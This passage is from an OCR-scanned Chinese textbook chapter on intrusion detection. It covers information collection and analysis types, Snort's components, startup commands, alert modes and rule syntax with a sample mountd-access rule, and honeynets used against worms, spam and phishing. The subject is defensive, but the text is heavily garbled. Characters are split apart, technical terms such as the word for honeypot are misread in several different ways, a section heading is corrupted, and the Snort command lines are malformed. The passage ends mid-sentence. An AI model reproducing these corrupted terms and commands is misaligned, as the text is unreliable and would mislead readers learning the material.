理 的 各 种 数据 中 查找 出 威胁 系统 安全 的 因素 ,并 对 威胁 做 出 相应 的 处 理 , 就 称 为 人 侵 检测 。 
响应 的 软件 或 硬件 称 为 人 侵 检测 系统 。 入 侵 检测 系统 被 认为 是 防火 墙 之 后 的 第 二 道 安全 闸 
门 , 它 在 不 影响 网 络 性 能 的 情况 下 对 网 络 进行 检测 ,提供 对 内 部 攻击 、 外 部 攻击 的 实时 保护 。 


6.1 入 侵 检测 原理 


6.1.1 入 侵 检测 的 步 又 


入 侵 检测 一 般 分 为 两 个 步骤 : 信息 收集 和 数据 分 析 。 

入 侵 检 测 的 第 一 步 是 信息 收集 ,内 容 包 括 系统 、 网 络 、 数 据 及 用 户 活动 的 状态 和 行为 。 
入 侵 检测 利用 的 信息 一 般 来 自 以 下 4 个 方面 : 系统 日 志 、 目 录 以 及 文件 异常 ,程序 执行 异常 
和 物理 形式 的 人 侵 信 息 。 

(1) 系统 日 志 : 利用 系统 日 志 是 检测 入 侵 的 必要 条 件 。 日 志文 件 中 记录 了 各 种 行为 类 
型 ,每 种 类 型 又 包含 不 同 的 信息 ,对 用 户 活动 来 讲 , 不 正常 的 或 不 期 望 的 行为 就 是 重复 登录 
失败 以 及 非 授权 访问 重要 文件 等 。 

(2) 目录 以 及 文件 异常 : 网 络 环境 中 的 文件 系统 包含 很 多 软件 和 数据 文件 ,包含 重要 
信息 的 文件 和 私有 数据 文件 经 常 是 被 修改 或 破坏 的 目标 。 

(3) 程序 执行 异常 : 网 络 系统 上 的 程序 执行 一 般 包 括 操作 系统 、 网 络 服务 ,用户 启动 的 
程序 和 应 用 。 每 个 在 系统 上 执行 的 程序 都 由 一 到 多 个 进程 实现 。 每 个 进程 执行 在 具有 不 同 
权限 的 环境 中 ,这 种 环境 控制 着 进程 可 访问 的 系统 资源 ,程序 和 数据 文件 等 。 

CA) 物理 形式 的 入 侵 信息 : 一 是 未 授权 的 网 络 硬 件 连接 ;二 是 物理 资源 的 未 授权 访问 。 


6.1.2 入 侵 检 测 技术 的 特点 


使 用 入 侵 检 测 技 术 时 ,应 该 注意 具有 以 下 技术 特点 的 应 用 要 根据 具体 情况 进行 选择 。 

CD. 信息 收集 分 析 时 间 : 可 分 为 固定 时 间 间 隔 、 实 时 收集 和 分 析 两 种 。 

采用 固定 时 间 间 隔 方法 ,在 固定 间隔 的 时 间 段 内 收集 和 分 析 这 些 信息 ,这 种 技术 适用 于 
对 安全 性 能 要 求 较 低 的 系统 ,对 系统 的 开销 影响 较 小 ;但 这 种 技术 的 缺点 是 在 时 间 间 隔 内 将 
失去 对 网 络 的 保护 。 

采用 实时 收集 和 分 析 技 术 可 以 实时 地 抑制 攻击 ,使 系统 管理 员 及 时 了 解 并 阻止 攻击 , 系 
统管 理 员 也 可 以 记录 黑客 的 信息 ;缺点 是 加 大 了 系统 开销 。 
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(2) 采用 的 分 析 类 型 : 分 为 签名 分 析 、 统 计 分 析 和 完整 性 分 析 。 

签名 分 析 就 是 同 攻击 数据 库 中 的 系统 设置 和 用 户 行为 模式 匹配 。 许 多 人 侵 检测 系统 中 
都 建 有 这 种 已 知 攻击 的 数据 库 。 这 种 数据 库 可 以 经 常 更 新 ,以 对 付 新 的 威胁 。 签 名 分 析 的 
优点 在 于 能 够 有 针对 性 地 收集 系统 数据 ,减少 了 系统 的 开销 ,如 果 数 据 库 不 是 特别 大 ,签名 
分 析 就 比 统计 分 析 更 有 效 。 

统计 分 析 用 来 发 现 偏离 正常 模式 的 行为 ,通过 分 析 正 常 应 用 的 属性 得 到 系统 的 统计 特 
征 ,对 每 种 正常 模式 计算 出 均值 和 偏差 , 当 侦 测 到 有 的 数值 偏离 正常 值 时 ,就 发 出 报警 信号 。 
这 种 技术 可 以 发 现 未 知 的 攻击 ,尤其 是 复杂 的 攻击 ,但 统计 传感器 误 码 率 较 大 。 

完整 性 分 析 主 要 关注 某 些 文件 和 对 象 的 属性 是 否 发 生 了 变化 。 完 整 性 分 析 通 过 被 称 为 
消息 摘录 算法 的 超 强 加 密 机 制 ,可 以 感受 到 微小 的 变化 。 这 种 分 析 可 以 侦 测 到 任何 使 文件 
发 生变 化 的 攻击 ,弥补 了 签名 分 析 和 统计 分 析 的 缺陷 ,但 是 这 种 分 析 的 实时 性 很 差 。 

(3) 对 攻击 和 误 用 的 反应 : 有 些 基 于 网 络 的 检测 系统 可 以 针对 侦 测 到 的 问题 做 出 反 
应 。 这 些 反 应 主要 有 改变 环境 .效用 检验 .实时 通知 等 。 改 变 环境 通常 包括 关闭 连接 ,重新 
设置 系统 。 由 于 改变 了 系统 的 环境 ,因此 可 以 通过 设置 代理 和 审计 机 制 获得 更 多 的 信息 ,从 
而 跟踪 黑客 。 许 多 实时 系统 还 允许 管理 员 选 择 一 种 预警 机 制 , 把 发 生 的 问题 实时 地 送 往 各 
个 地 方 。 

CA) 管理 和 安装 : 用 户 采用 检测 系统 时 ,需要 根据 本 网 的 一 些 具 体 情况 而 定 。 实 际 上 ， 
没有 两 种 完全 相同 的 网 络 环境 ,因此 就 必须 对 采用 的 系统 进行 配置 。 例 如 ,可 以 配置 系统 的 
网 络 地 址 、 安 全 条 目 等 。 某 些 基 于 主机 的 检测 系统 还 提供 友好 的 用 户 界面 ,让 用 户 说 明 需 要 
传感器 采集 哪些 信息 。 


6.1.3 Snort 简介 


Snort 是 Martin Roesch 等 人 开发 的 一 种 用 C 语言 编写 的 开放 源码 的 入 侵 检测 系统 。 
Martin Roesch 把 Snort 定位 为 一 个 轻 量 级 的 、 跨 平台 、 支 持 多 操作 系统 的 入 侵 检测 系统 。 
它 具 有 实时 数据 流量 分 析 和 TP 数据 包 日 志 分 析 的 能 力 , 具 有 跨 平 台 特 征 , 能 够 进行 协议 分 
析 和 对 内 容 的 搜索 /匹配 。 它 能 够 检测 不 同 的 攻击 行为 ,如 缓冲 区 溢出 ,端口 扫描 、DoS 攻击 
等 ,并 进行 实时 报警 。Snort 可 安装 在 网 络 上 的 一 台 主 机 上 对 整个 网 络 进行 监视 。 

Snort 由 3 个 子 系统 构成 : 数据 包 解码 器 .检测 引擎 .日 志 与 报警 系统 。 在 使 用 Snort 
之 前 ,需要 根据 网 络 环境 和 安全 策略 对 Snort 进行 配置 .主要 包括 设置 网 络 变量 .配置 预 处 
理 器 (preprocessors) .配置 输出 插件 .配置 使 用 的 规则 集 。 因 为 在 入侵 检测 过 程 中 采用 了 规 
则 匹配 的 检测 方法 ,所 以 误 码 率 较 低 。 

Snort 有 3 种 工作 模式 : 嗅 探 器 数据 包 记 录 器 、 网 络 和 信 侵 检测 系统 。 嗅 探 器 模式 仅仅 
是 从 网 络 上 读 取 数据 包 并 作为 连续 不 断 的 流 显示 在 终端 FE。 数据 包 记录 器 模式 把 数据 包 记 
录 到 硬盘 上 。 网 络 人 侵 检测 模式 是 最 复杂 的 ,而 且 是 可 配置 的 ,可 以 让 Snort 分 析 网 络 数据 
流 以 匹配 用 户 定义 的 一 些 规 则 ,并 根据 检测 结果 采取 一 定 的 动作 。 

1. 功能 特征 

虽然 Snort 是 一 个 轻 量 级 的 入 侵 检 测 系 统 , 但 是 它 的 功能 非常 强大 ,其 特点 如 下 。 

1) 跨 平台 性 

可 以 支持 Linux, Solaris, UNIX, Windows 系列 等 平台 ,而 大 多 数 商 用 入 侵 检测 软件 只 
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能 支持 一 、 两 种 操作 系统 ,甚至 需要 特定 的 操作 系统 。 

2) 功能 完备 

具有 实时 流量 分 析 的 能 力 ,能 够 快速 监测 网 络 攻 击 , 并 能 及 时 发 出 警报 。 使 用 协议 分 析 
和 内 容 匹 配 的 方式 ,提供 了 对 TCP、UDP、ICMP 等 协议 的 支持 ,对 缓冲 区 溢出 、 隐 项 端口 扫 
HH CGI 扫描 ,SMB 探测 .操作 系统 指纹 特征 扫描 等 攻击 都 可 以 检测 。 

3) 使 用 插件 的 形式 

方便 管理 员 根据 需要 调用 各 种 插件 模块 ,包括 输入 插件 和 输出 插件 。 输 入 插件 主要 负 
责 对 各 种 数据 包 的 处 理 , 具 备 传输 层 连接 恢复 、 应 用 层 数据 提取 、 基 于 统计 的 数据 包 异 常 检 
测 的 功能 ,从 而 拥有 很 强 的 系统 防护 功能 ,如 使 用 TCP 流 插件 ,可 以 对 TCP 包 进 行 重组 。 

输出 插件 主要 用 来 将 检测 到 的 报警 以 多 种 方式 输出 ,通过 输出 插件 输出 MySQL, SQL 
等 数据 库 , 还 可 以 以 XML 格式 输出 ,也 可 以 把 网 络 数据 保存 到 TCP Dump 格式 的 文件 中 ; 
按照 其 输出 插件 规范 ,用 户 甚至 可 以 自己 编写 插件 ,自己 处 理 报警 的 方式 并 进而 做 出 响应 ， 
从 而 使 Snort 具有 非常 好 的 可 扩展 性 和 灵活 性 。 

4) Snort 规则 描述 简单 

Snort 基于 规则 的 检测 机 制 十 分 简单 和 灵活 ,使 其 可 以 迅速 对 新 的 入 侵 行为 做 出 反应 ， 
发 现 网 络 中 潜在 的 安全 漏洞 。 同 时 ,该 网 站 提供 几乎 与 http://www. cert. org( 应 急 响 应 中 
心 ,负责 全 球 的 网 络 安全 事件 以 及 漏洞 的 发 布 ) 同 步 的 规则 库 更 新 ,因此 甚至 许多 商业 的 人 
侵 检测 软件 直接 使 用 Snort 的 规则 库 。 图 6. 1. 1 显示 了 Snort 的 系统 组 成 和 数据 处 理 
流程 。 


数据 包 捕获 器 
Libpcap/Winpcap 


数据 包 解码 器 


Decoder 


l 


预 处 理 器 


Oreprocessor 


检测 引擎 。 T] 二 维 规则 链表 匹配 


Detection Engine m 


I 


日 志和 报警 子 系统 


图 611 Snot 的 系统 组 成 和 数据 处 理 流程 


(1) 数据 包 捕获 器 。 

基于 网 络 的 入侵 检测 系统 需要 捕获 并 分 析 所 有 传输 到 监控 网 卡 的 网 络 数据 ,这 就 需要 
包 捕获 技术 、Snort 通过 两 种 机 制 实 现 : 一 种 方式 是 将 网 卡 设置 为 混杂 模式 ; 另 一 种 方式 是 
利用 Libpcap/Winpcap 函数 库 从 网 卡 捕获 网 络 数据 包 。 

数据 包 捕获 函数 库 是 一 个 独立 的 软件 工具 ,能 直接 从 网 卡 中 获取 数据 包 。 该 函数 库 是 
由 加 州 大 学 伯克利 分 校 Lawrence Berkeley National Laboratory 研究 院 开 发 ,Libpcap 支持 


* 162 * 


所 有 基于 可 移植 操作 系统 接口 (Portable Operating System Interface of UNIX. POSDO 的 
操作 系统 ,如 Linux, UNIX 等 ,后 来 为 支持 跨 平 台 特性 又 开发 了 Windows 版 本 (http:// 
www. winpcap. org). Windows 下 的 函数 调用 ,几乎 和 Linux 下 的 函数 调用 完全 相同 ， 
Snort 就 是 通过 调用 该 库 函 数 从 网 络 设备 上 捕获 数据 包 。 
(2) 数据 包 解 码 器 。 
数据 包 解 码 器 主要 对 各 种 协议 栈 上 的 数据 包 进 行 解析 、 预 处 理 , 以 便 提交 给 检测 引擎 进 
行规 则 匹配 。 解 码 器 运行 在 各 种 协议 栈 之 上 ,从 数据 链 路 层 到 传输 层 , 最 后 到 应 用 层 , 因 为 
当前 网 络 中 的 数据 流速 度 很 快 ,如 何 保障 较 高 的 速度 是 解码 器 子 系统 中 的 一 个 重点 。 目 前 ， 
Snort 解码 器 支持 的 协议 包括 Ethernet, SLIP 和 PPP 等 。 
(3) 预 处 理 器 。 
预 处 理 模块 的 作用 是 对 当前 截获 的 数据 包 进 行 预 处 理 ,以 便 后 续 处 理 模块 对 数据 包 进 
行 处 理 操作 。 由 于 最 大 数据 传输 单元 (MTU) 的 限制 及 网 络 延迟 等 问题 ,路 由 器 会 对 数据 包 
进行 分 片 处 理 。 但 是 ,恶意 攻击 者 也 会 故意 发 送 经 过 软件 加 工 过 的 数据 包 ,以 便 把 一 个 带 有 
攻击 性 的 数据 包 分 散 到 各 个 小 的 数据 包 中 ,并 有 可 能 打 乱 数据 包 的 传输 次 序 , 多 次 传输 到 目 
标 主机 。 因 此 ,对 异常 数据 包 的 处 理 也 是 入 侵 检 测 系统 的 重要 内 容 。 
预 处 理 器 主要 包括 以 下 功能 。 
* 模拟 TCP/IP 堆栈 功能 的 插件 ,如 IP 碎片 重组 .TCP 流 重组 插件 。 
。 各 种 解码 插件 : HTTP 解码 插件 、Unicode 解码 插件 .RPC 解码 插件 .Telnet 解码 插 
件 等 。 

。 规则 匹配 无 法 进行 攻击 检测 时 所 用 的 检测 插件 : 端口 扫描 插件 .Spade 异常 人 侵 检 
测 插 件 、Bo 检测 插件 .ARP 欺骗 检测 插件 等 。 根 据 各 预 处 理 插件 文件 名 ,可 对 此 插 
件 功能 进行 推断 。 

(4) 检测 引擎 。 

检测 引 敬 是 入 侵 检测 系统 的 核心 内 容 。Snort 用 一 个 二 维 链表 存储 它 的 检测 规则 ,其 
中 一 维 称 为 规则 头 , 另 一 维 称 为 规则 选项 。 规 则 头 中 放置 的 是 一 些 公 共 属 性 特征 ,而 规则 选 
项 中 放置 的 是 一 些 人 侵 特征 。Snort 从 配置 文件 读 取 规 则 文件 的 位 置 ,并 从 规则 文件 读 取 
规则 ,存储 到 二 维 链表 中 。 

Snort 的 检测 就 是 二 维 规则 链表 和 网 络 数 据 匹配 的 过 程 ,一 旦 匹配 成 功 , 则 把 检测 结果 
输出 到 输出 插件 。 为 了 提高 检测 速度 ,通常 把 最 常用 的 源 / 目 的 IP 地 址 和 端口 信息 放 在 规 
则 头 链表 中 ,而 把 一 些 独特 的 检测 标志 放 在 规则 选项 链表 中 。 规 则 匹配 查找 采用 递归 的 方 
法 进行 ,检测 机 制 只 针对 当前 已 经 建立 的 链表 选项 进行 检测 , 当 数 据 包 满足 一 个 规则 时 ,就 
会 触发 相应 的 操作 。Snort 的 检测 机 制 非常 灵活 ,用 户 可 以 根据 自己 的 需要 很 方便 地 在 规 
则 链表 中 添加 所 需要 的 规则 模块 。 数 据 包 匹 配 算法 采用 经 典 匹配 算法 一 一 多 模式 匹配 算法 
(AC-BM) 。 采 用 二 维 链表 和 经 典 匹 配 算法 都 是 为 了 提高 与 网 络 数据 包 的 匹配 速度 ,从 而 提 
高 人 侵 检测 速度 。 

(5) 日 志和 报警 子 系统 。 

日 志和 报警 子 系统 可 以 在 运行 Snort 的 时 候 以 命令 行 交 互 的 方式 进行 选择 ,如 果 在 运 
行 时 指定 了 命令 行 的 输出 开关 ,在 Snort 规则 文件 中 指定 的 输出 插件 就 会 被 替代 。 现 在 可 
供 选 择 的 日 志 形 式 有 3 种 ,报警 形式 有 6 种 。Snort 可 以 把 数据 包 以 解码 后 的 文本 形式 或 者 
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TCPDump 的 二 进 制 形式 进行 记录 。 解码 后 的 格式 便于 系统 对 数据 进行 分 析 , 而 
TCPDump 格式 可 以 保证 很 快 地 完成 磁盘 记录 功能 ,第 3 种 日 志 机 制 就 是 关闭 日 志 服 务 , 什 
么 也 不 做 。 使 用 数据 库 输出 插件 ,Snort 可 以 把 日 志 记 入 数据 库 , 当前 支持 的 数据 库 包 括 
PostgreSQL、MySQL、Oracle 以 及 UNIX ODBC 数据 库 。 

2. 基本 操作 

1) 启动 

Snort 作为 网 络 人 侵 检测 系统 ,使 用 下 面 的 命令 行 可 以 启动 这 种 模式 。 


Snort - dev - 1 log -h 192.168.1.0/24 - c Snort.conf 


Snort 会 对 每 个 包 和 规则 集 进 行 匹 配 , 如 果 发 现 这 样 的 包 , 就 会 根据 规则 的 设置 采取 相 
应 的 行动 。 如 果 不 指 定 输出 目录 ,Snort 就 输出 到 /var/log/Snort 目录 。 
也 可 以 采用 如 下 的 简单 命令 方式 。 


Snort - i2 - c Snort.conf 


其 中 ,i 选 项 为 选择 网 卡 ,监控 的 网 络 设置 ,以 及 输出 方式 的 设置 都 在 Snort. conf 中 。 

2) 输出 

在 网 络 人 侵 检测 模式 下 ,有 多 种 方式 配置 Snort 的 输出 。 默 认 情 况 下 ,Snort 以 ASCII 
格式 记录 日 志 , 使 用 full 报警 机 制 。 

Snort 有 6 种 报警 机 制 : full, fast, socket, syslog, smb(WinPopup) Wl none。 其 中 有 4 
种 报警 机 制 可 以 在 命令 行 状态 下 使 用 -A 选项 设置 。 

-A fast: 报警 信息 包括 一 个 时 间 戳 (timestamp) ,报警 消息 、 源 /目的 TP 地 址 和 端口 。 

-A full; 是 默认 的 报警 模式 。 

-A socket: 使 Snort 将 告警 信息 通过 UNIX 的 套 接 字 发 往 一 个 负责 处 理 告警 信息 的 主 
机 ,在 该 主机 上 有 一 个 程序 在 套 接 字 上 进行 监听 。 

-A none: 关闭 报警 机 制 。 

3) 规则 集 

规则 集 是 Snort 的 攻击 特征 库 , 每 条 规则 是 一 条 攻击 标识 ,Snort 通过 它 识 别 攻击 行为 。 
Snort 使 用 一 种 简单 的 、 轻 量 级 的 规则 描述 语言 ,这 种 语言 灵活 而 强大 。 一 条 Snort 规则 可 
以 从 人 逻辑 上 分 为 两 部 分 , 即 规则 头 ( 括 号 左边 的 内 容 ) 和 规则 选项 (括号 内 的 内 容 )。 

规则 头 包含 有 匹配 的 行为 动作 ,协议 类 型 、 源 IP 及 端口 ,数据 包 方 向 .目标 IP 及 端口 。 
动作 包括 3 类 , 即 告警 (Alert) .日 志 (Log) 和 通行 (Pass) ,表明 Snort 对 包 的 3 种 处 理 方式 ， 
其 中 最 常用 的 是 Alert 动作 , 它 会 向 报警 日 志 中 写 入 报警 信息 。 

在 源 、 目 的 地 址 、 端 口中 可 以 使 用 any 代表 任意 的 地 址 或 端口 ,还 可 以 使 用 符号 "1" 表明 
取 非 运算 。IP 地 址 可 以 被 指定 为 一 个 CIDR 的 地 址 块 ,端口 也 可 以 指定 一 个 范围 ,在 目的 
和 源 地 址 之 间 可 以 使 用 标识 符 “ 二 一 *" 和 “一 二 ”指明 方向 。 

规则 的 选项 部 分 是 一 个 或 几 个 选项 的 组 合 ,选项 之 间 用 “;” 分 隔 , 选 项 关键 字 和 值 之 间 
EH". ”分 隔 。 对 规则 选项 的 分 析 构 成 了 Snort 检测 引擎 的 核心 。 主 要 分 为 4 类 : 数据 包 
相关 各 种 特征 的 说 明 选 项 与 规则 本 身 相 关 的 一 些 说 明 选 项 ,规则 匹配 后 的 动作 选项 、 对 某 
些 选项 的 进一步 修饰 。 

下 面 是 一 个 规则 范例 。 
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alert tcp any any -> 192.168.1.0/24 111 (content: "| 00 01 86 a5| "; msg: "mountd access"; ) 


该 规则 表示 监控 的 网 络 数据 的 协议 为 TCP, 源 地 址 、 源 端口 为 任意 值 ,方向 为 由 外 向 
内 ,内 部 的 网 络 地 址 为 子 网 192. 168. 1. 0/24, 端 口号 为 111, 当 发 现 数据 包 中 有 “00 01 86 
a5” 内 容 时 ,Snort 会 发 送 报警 信息 mountd access, 


6.1.4 BRT 


快速 发 展 的 Internet 正面 临 着 日 益 严重 的 网 络 安全 问题 。Hacker、 脚 本 和 职业 黑客 给 
Internet 带 来 巨大 的 安全 威胁 ,它们 批量 地 扫描 网 段 , 以 找到 有 漏洞 的 主机 并 进行 攻击 , 编 
写 并 投放 功能 越 来 越 强 的 恶意 软件 ,通过 僵尸 网 络 控制 遭 攻陷 的 主机 并 通过 它们 发 送 大 量 
垃圾 邮件 ,同时 窃取 用 户 的 个 人 信息 。Internet 的 安全 状况 如 此 糟糕 ,主要 是 攻击 方 与 防御 
方 之 间 进 行 着 信息 上 不 对 称 的 博弈 , 蜜 钠 技术 就 是 为 了 扭转 这 种 不 对 称 局 面 而 提出 的 ,其 本 
质 上 是 一 种 对 攻击 者 进行 欺骗 的 技术 ,通过 对 攻击 者 行为 的 诱捕 ,安全 人 员 及 时 了 解 攻击 者 
的 攻击 方法 及 工具 ,以便 能 及 时 预警 。 在 此 技术 基础 上 发 展 延 伸 的 蜜 网 技术 是 由 多 种 网 络 
防护 系统 和 分 析 工 具 组 成 的 一 整套 体系 结构 ,这 种 体系 结构 创建 了 一 个 高 度 可 控 的 网 络 ,使 
得 安全 人 员 能 更 深入 地 了 解 各 种 攻击 行为 的 新 技术 ,从 而 能 及 时 预警 和 防御 网 络 安全 威胁 。 

1. 蜜 网 的 定义 和 分 类 

蜜 网 是 在 蜜 钢 技 术 之 上 逐步 发 展 起 来 的 一 个 新 概念 ,又 可 称 为 诱捕 网 络 。 蜜 网 技术 是 
由 蜜 网 项 目 组 (The Honeynet Project) 提 出 并 倡导 的 由 真实 主机 、 操 作 系 统 、 网 络 服务 和 应 
用 程序 构成 的 网 络 体系 框架 ,结合 了 一 系列 数据 控制 ,捕获 和 分 析 工 具 ,使 得 安全 研究 人 员 
能 够 更 好 地 在 一 个 高 度 可 控 的 环境 中 了 解 Internet 的 安全 威胁 。 

传统 的 蜜 负 技术 根据 交互 程度 分 类 ,可 分 为 3 类 。 

CD 低 交互 蜜 饶 运 行 于 现 有 系统 上 的 仿真 服务 ,提供 少量 的 交互 功能 。 

(2) 中 交互 蜜 饶 也 不 提供 真实 操作 系统 ,而 是 应 用 脚本 或 小 程序 模拟 服务 行为 ,提供 的 
功能 主要 取决 于 脚本 。 

(3) 高 交互 蜜 饶 由 真实 的 操作 系统 构建 ,提供 给 Hacker 的 是 真实 的 系统 和 服务 ,高 风 
险 同 时 可 以 获取 大 量 关 于 Hacker 攻击 的 信息 ; 蜜 网 技术 属于 一 种 高 交互 型 .研究 型 的 用 来 
获取 广泛 的 安全 威胁 信息 的 蜜 钢 技 术 ,在 用 蜜 网 技术 构成 的 网 络 体系 架构 中 可 以 包含 一 个 
DEZ E 

根据 构建 蜜 网 所 需 的 资源 和 配置 ,可 分 为 两 类 。 

(1) 物理 蜜 网 : 体系 架构 中 的 蜜 缸 主机 都 是 真实 的 系统 ,通过 与 防火 墙 、 物 理 网 关 、 和 人 
侵 防 御 系 统 .日 志 服 务 器 等 一 些 物理 设备 组 合 ,共同 组 成 一 个 高 度 可 控 的 网 络 。 这 类 蜜 网 组 
建 对 物理 系统 的 开销 很 大 ,而 且 它 是 由 真实 系统 构建 的 ,对 安全 性 能 要 求 更 高 ,一旦 蜜 钢 主 
机 被 攻陷 ,将 波及 内 网 的 安全 。 

(2) 虚拟 蜜 网 : 在 同一 硬件 平台 上 运行 多 个 操作 系统 和 多 种 网 络 服务 的 虚拟 网 络 环 
境 , 相 对 于 物理 蜜 网 开销 小 ,易于 管理 。 由 于 这 类 蜜 网 一 般 通 过 一 些 虚拟 操作 系统 软件 (如 
VMWare 和 User Mode Linux) 在 单 台 主机 上 部 署 整个 蜜 网 ,因此 扩展 性 差 ,而 且 虚 拟 软件 
本 身 也 会 有 漏洞 ,一 旦 被 攻击 者 破坏 , 则 整个 蜜 网 就 会 被 控制 。 虚 拟 蜜 网 根据 其 使 用 方式 又 
可 分 为 两 类 。 

。 独立 虚拟 蜜 网 : 搭建 在 一 台 计 算 机 上 的 蜜 饶 网 络 。 网 络 内 包括 不 定数 量 的 虚拟 蜜 
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HE ,数据 控制 和 捕获 都 由 这 人 台 机 器 完成 。 

。 混合 虚拟 蜜 网 : 传统 的 蜜 网 技术 和 虚拟 软件 技术 结合 在 一 起 组 成 的 蜜 缸 网 络 , 网 内 
蜜 饶 可 以 是 真实 的 主机 和 服务 ,也 可 以 是 虚拟 蜜 缸 。 数 据 控制 .收集 系统 、 防 火 墙 、 
入 侵 检测 系统 等 均 封 闭 在 一 个 隔离 系统 中 。 

蜜 网 技术 实质 上 仍 是 一 种 蜜 饶 技 术 ,但 它 与 传统 的 蜜 缸 技术 相 比 具 有 两 大 优势 : 首先 ， 
蜜 网 是 一 种 高 交互 型 的 用 来 获取 广泛 的 安全 威胁 信息 的 蜜 饶 ,高 交互 意味 着 蜜 网 是 用 真实 
的 系统 ,应 用 程序 以 及 服务 与 攻击 者 进行 交互 ;其 次 , 蜜 网 是 由 多 个 蜜 缸 以 及 防火 墙 , 和 人 侵 防 
御 系 统 、 系 统 行为 记录 、 自 动 报警 辅助 分 析 等 一 系列 系统 和 工具 组 成 的 一 整套 体系 结构 ,这 
种 体系 结构 创建 了 一 个 高 度 可 控 的 网 络 , 使 得 安全 研究 人 员 可 以 控制 和 监视 其 中 的 所 有 攻 
击 活动 ,从 而 了 解 攻击 者 的 攻击 工具 \ 方 法 和 动机 。 

蜜 网 体系 结构 具有 三 大 核心 需求 , 即 数据 控制 .数据 捕获 和 数据 分 析 。 数 据 控 制 是 
对 攻击 者 在 蜜 网 中 对 第 三 方 发 起 的 攻击 行为 进行 限制 的 机 制 , 以 减轻 蜜 网 的 风险 ;数据 
捕获 技术 能 够 监控 和 记录 攻击 者 在 蜜 网 内 的 所 有 行为 ;数据 分 析 技 术 则 是 对 捕获 到 的 攻 
击 数据 进行 整理 和 融合 ,以 辅助 安全 专家 从 中 分 析出 这 些 数据 背后 的 攻击 工具 \ 方 法 、 技 
术 和 动机 。 

2. 蜜 网 的 应 用 

应 用 蜜 网 技术 进行 网 络 安全 防御 的 研究 还 在 摸索 进行 中 ,下 面 针 对 目前 危及 网 络 安 全 
较为 严重 的 几 种 威胁 ,利用 蜜 网 技术 进行 防御 的 可 行 性 探讨 。 

1) 抗 蠕虫 病毒 

蠕虫 的 一 般 传 播 过 程 为 扫描 、 感 染 、 复 制 。 经 过 大 量 扫 描 , 当 探测 到 存在 漏洞 的 主机 时 ， 
蠕虫 主体 就 会 迁移 到 目标 主机 。 然 后 在 被 感染 的 主机 上 进行 一 系列 处 理 : 隐藏 .信息 搜索 、 
替换 文件 ,生成 多 个 副本 ,实现 对 计算 机 监控 和 破坏 ,并 在 网 络 中 不 断 重复 该 过 程 。 利 用 蜜 
网 技术 ,可 以 在 蠕虫 感染 的 阶段 检测 非法 入 侵 行为 ,对 于 已 知 蠕虫 病毒 ,可 以 通过 设置 防火 
墙 和 IDS 规则 ,直接 重 定向 到 蜜 网 的 蜜 饶 中 ,拖延 蠕虫 的 攻击 时 间 , 并 对 其 行为 进行 记录 ， 
同时 及 时 对 网 络 安全 作 预 警 ; 对 于 全 新 的 蠕虫 病毒 ,可 以 采取 办 法 延缓 其 扫描 速度 ,在 网 络 
层 用 特定 的 、 伪 造 数据 包 延 迟 应 答 ,同时 利用 软件 工具 和 一 定 的 算法 对 日 志 进 行 分 析 , 以 便 
确定 相应 的 对 抗 措施 。 

2) 反 垃圾 邮件 

垃圾 邮件 作为 一 种 网 络 上 的 无 用 信息 ,严重 影响 邮件 系统 的 使 用 效率 。 垃 圾 邮件 发 送 
者 通过 IP 地 址 的 收集 ,借助 僵尸 网 络 进行 群发 ,这 样 占 用 了 大 量 的 网 络 带宽 ,同时 部 分 垃圾 
邮件 还 携带 了 病毒 和 木马 ,威胁 着 网 络 信 息 的 安全 。 目 前 使 用 的 垃圾 邮件 发 送 技术 主要 有 
伪造 信 头 、 利 用 中 继 转发 .直接 投递 .动态 IP 技术 4 种 ,而 且 现 有 常规 的 反 垃 圾 邮件 也 都 是 
针对 这 4 种 技术 的 ,如 关闭 /开放 中 继 功 能 、 黑 名 单 技术 、 反 向 域名 解析 、 垃 圾 邮件 过 滤 技 术 、 
行为 识别 等 。 借 助 蜜 网 技术 的 欺骗 性 ,也 可 用 于 反 垃 圾 邮件 。 首 先 ,在 蜜 网 中 的 多 台 蜜 饶 主 
机 可 以 创建 很 多 虚假 地 址 欺骗 垃圾 邮件 制造 者 ,使 得 他 们 收集 到 许多 无 效 的 目标 填充 数据 
库 ; 其 次 ,垃圾 邮件 发 送 有 一 定 行为 特征 ,如 短 时 发 送 量 大 ,伪造 发 送 服 务 器 ,利用 一 定 的 流 
量 或 异常 检测 办 法 就 可 以 检测 到 或 被 虚拟 的 邮件 账户 捕获 , 重 定向 到 蜜 铅 中 进行 分 析 , 由 于 
蜜 网 中 可 以 部 署 大 量 的 这 类 蜜 饶 , 这 样 可 以 有 效 捕获 和 分 析 。 

3) 捕获 网 络 钓鱼 
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网 络 钓鱼 是 通过 大 量 发 送 声称 来 自 于 银行 或 其 他 知名 机 构 的 欺骗 性 垃圾 邮件 ,或 仿造 
商业 机 构 的 网 站 ,意图 引诱 收 信人 给 出 敏感 信息 的 一 种 攻击 方式 。 网 络 钓鱼 的 主要 方式 有 
3 种 。 

CD 攻破 有 安全 漏洞 的 服务 器 并 且 安 装 恶意 的 网 页 内 容 。 

© 端口 重 定向 。 

© 利用 僵尸 网 络 快速 群发 垃圾 邮件 。 

目前 的 反 网 络 钓鱼 工作 组 等 机 构 寄 希望 于 发 觉 网 络 钓鱼 攻击 的 用 户 向 他 们 报告 ,并 由 
被 假冒 的 知名 机 构 以 及 安全 响应 部 门 的 安全 专家 根据 提供 的 线索 找 出 钓鱼 网 站 的 物理 位 
置 ,通过 一 系列 措施 将 其 捣毁 。 这 种 途径 只 能 在 网 络 钓 鱼 攻击 发 生 后 从 受害 者 的 角度 观察 ， 
并 不 能 清晰 地 了 解 网 络 钓鱼 攻击 的 全 过 程 。 而 蜜 网 技术 则 提供 了 捕获 整个 过 程 中 攻击 者 发 
起 攻击 行为 的 能 力 ,在 蜜 网 中 的 蜜 饶 都 是 初始 安装 的 没有 打 漏洞 补丁 的 系统 ,一 旦 部 署 的 蜜 
网 被 网 络 钓鱼 者 进行 网 络 钓鱼 攻击 ,安全 分 析 人 员 就 能 及 时 在 蜜 网 捕获 的 丰富 日 志 数据 的 
基础 上 ,对 网 络 钓鱼 攻击 的 整个 生命 周期 建立 起 一 个 完整 的 理解 ,并 深入 剖析 各 个 步 又 钓鱼 
者 使 用 的 技术 手段 和 工具 ,同时 提供 潜在 的 漏洞 威胁 预警 。 由 于 网 络 钓鱼 攻击 采用 了 上 述 
第 @、 加 中 非常 规 技术 手段 ,使 得 利用 蜜 网 技术 对 网 络 钓鱼 攻击 进行 捕获 和 深入 分 析 还 具有 
